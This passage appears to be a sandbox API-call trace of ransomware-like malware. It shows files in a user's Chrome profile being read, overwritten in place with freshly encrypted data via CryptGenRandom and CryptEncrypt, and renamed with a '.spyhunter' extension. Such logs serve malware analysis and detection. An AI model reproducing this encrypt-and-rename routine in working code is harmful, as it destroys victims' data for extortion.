lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.783] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0137.783] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.783] GetProcessHeap () returned 0x2c0000 [0137.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.783] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1c4*=0xf2, lpOverlapped=0x0) returned 1 [0137.784] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.784] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x25cf1c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1c4*=0xf2, lpOverlapped=0x0) returned 1 [0137.784] GetProcessHeap () returned 0x2c0000 [0137.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.784] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.784] WriteFile (in: hFile=0xec, lpBuffer=0x25cf204*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf204*, lpNumberOfBytesWritten=0x25cf1c4*=0x4, lpOverlapped=0x0) returned 1 [0137.784] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1c4*=0x30, lpOverlapped=0x0) returned 1 [0137.784] CloseHandle (hObject=0xec) returned 1 [0137.785] GetProcessHeap () returned 0x2c0000 [0137.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.785] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.spyhunter") returned 165 [0137.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0137.785] GetProcessHeap () returned 0x2c0000 [0137.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.785] GetProcessHeap () returned 0x2c0000 [0137.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.785] GetProcessHeap () returned 0x2c0000 [0137.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e470 | out: hHeap=0x2c0000) returned 1 [0137.787] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf200 | out: pbBuffer=0x25cf200) returned 1 [0137.787] GetProcessHeap () returned 0x2c0000 [0137.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.787] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1f8*=0x30) returned 1 [0137.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0137.787] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.787] GetProcessHeap () returned 0x2c0000 [0137.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.787] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1bc*=0xe2, lpOverlapped=0x0) returned 1 [0137.788] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.788] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x25cf1bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1bc*=0xe2, lpOverlapped=0x0) returned 1 [0137.788] GetProcessHeap () returned 0x2c0000 [0137.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.788] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.788] WriteFile (in: hFile=0xec, lpBuffer=0x25cf1fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf1fc*, lpNumberOfBytesWritten=0x25cf1bc*=0x4, lpOverlapped=0x0) returned 1 [0137.789] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1bc*=0x30, lpOverlapped=0x0) returned 1 [0137.789] CloseHandle (hObject=0xec) returned 1 [0137.789] GetProcessHeap () returned 0x2c0000 [0137.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.789] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.spyhunter") returned 165 [0137.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0137.789] GetProcessHeap () returned 0x2c0000 [0137.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.789] GetProcessHeap () returned 0x2c0000 [0137.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.790] GetProcessHeap () returned 0x2c0000 [0137.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e160 | out: hHeap=0x2c0000) returned 1 [0137.790] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1f8 | out: pbBuffer=0x25cf1f8) returned 1 [0137.791] GetProcessHeap () returned 0x2c0000 [0137.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.791] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1f0*=0x30) returned 1 [0137.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0137.791] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.791] GetProcessHeap () returned 0x2c0000 [0137.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.791] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1b4*=0xe6, lpOverlapped=0x0) returned 1 [0138.022] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.022] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x25cf1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1b4*=0xe6, lpOverlapped=0x0) returned 1 [0138.089] GetProcessHeap () returned 0x2c0000 [0138.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.090] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.090] WriteFile (in: hFile=0xec, lpBuffer=0x25cf1f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf1f4*, lpNumberOfBytesWritten=0x25cf1b4*=0x4, lpOverlapped=0x0) returned 1 [0138.090] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1b4*=0x30, lpOverlapped=0x0) returned 1 [0138.090] CloseHandle (hObject=0xec) returned 1 [0138.090] GetProcessHeap () returned 0x2c0000 [0138.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.090] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.spyhunter") returned 165 [0138.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.spyhunter")) returned 1 [0138.091] GetProcessHeap () returned 0x2c0000 [0138.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.091] GetProcessHeap () returned 0x2c0000 [0138.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0138.091] GetProcessHeap () returned 0x2c0000 [0138.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1de50 | out: hHeap=0x2c0000) returned 1 [0138.092] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1f0 | out: pbBuffer=0x25cf1f0) returned 1 [0138.092] GetProcessHeap () returned 0x2c0000 [0138.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0138.093] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1e8*=0x30) returned 1 [0138.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0138.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0138.103] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0138.103] GetProcessHeap () returned 0x2c0000 [0138.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.103] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf1ac*=0x2800, lpOverlapped=0x0) returned 1 [0138.175] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.175] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf1ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf1ac*=0x2800, lpOverlapped=0x0) returned 1 [0138.230] GetProcessHeap () returned 0x2c0000 [0138.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.231] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.231] WriteFile (in: hFile=0xec, lpBuffer=0x25cf1ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf1ec*, lpNumberOfBytesWritten=0x25cf1ac*=0x4, lpOverlapped=0x0) returned 1 [0138.231] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1ac*=0x30, lpOverlapped=0x0) returned 1 [0138.231] CloseHandle (hObject=0xec) returned 1 [0138.231] GetProcessHeap () returned 0x2c0000 [0138.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.231] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 177 [0138.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0138.232] GetProcessHeap () returned 0x2c0000 [0138.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.232] GetProcessHeap () returned 0x2c0000 [0138.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0138.232] GetProcessHeap () returned 0x2c0000 [0138.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe56d0 | out: hHeap=0x2c0000) returned 1 [0138.232] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1e8 | out: pbBuffer=0x25cf1e8) returned 1 [0138.232] GetProcessHeap () returned 0x2c0000 [0138.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0138.232] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1e0*=0x30) returned 1 [0138.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.282] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0138.282] StrStrW (lpFirst="A059.tmp", lpSrch=".txt") returned 0x0 [0138.282] GetProcessHeap () returned 0x2c0000 [0138.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.282] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf1a4*=0x0, lpOverlapped=0x0) returned 1 [0138.282] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.283] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf1a4*=0x0, lpOverlapped=0x0) returned 1 [0138.283] GetProcessHeap () returned 0x2c0000 [0138.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.283] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.283] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf1e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf1e4*, lpNumberOfBytesWritten=0x25cf1a4*=0x4, lpOverlapped=0x0) returned 1 [0138.284] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1a4*=0x30, lpOverlapped=0x0) returned 1 [0138.284] CloseHandle (hObject=0x16c) returned 1 [0138.284] GetProcessHeap () returned 0x2c0000 [0138.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0138.284] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.spyhunter") returned 112 [0138.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp.spyhunter")) returned 1 [0138.354] GetProcessHeap () returned 0x2c0000 [0138.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0138.354] GetProcessHeap () returned 0x2c0000 [0138.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0138.354] GetProcessHeap () returned 0x2c0000 [0138.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a060 | out: hHeap=0x2c0000) returned 1 [0138.354] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1e8 | out: pbBuffer=0x25cf1e8) returned 1 [0138.354] GetProcessHeap () returned 0x2c0000 [0138.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0138.355] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1e0*=0x30) returned 1 [0138.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned 81 [0138.355] StrStrW (lpFirst="First Run", lpSrch=".txt") returned 0x0 [0138.355] GetProcessHeap () returned 0x2c0000 [0138.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0138.355] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf1a4*=0x0, lpOverlapped=0x0) returned 1 [0138.355] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.355] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf1a4*=0x0, lpOverlapped=0x0) returned 1 [0138.356] GetProcessHeap () returned 0x2c0000 [0138.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0138.356] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.356] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf1e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf1e4*, lpNumberOfBytesWritten=0x25cf1a4*=0x4, lpOverlapped=0x0) returned 1 [0138.357] WriteFile (in: hFile=0x16c, 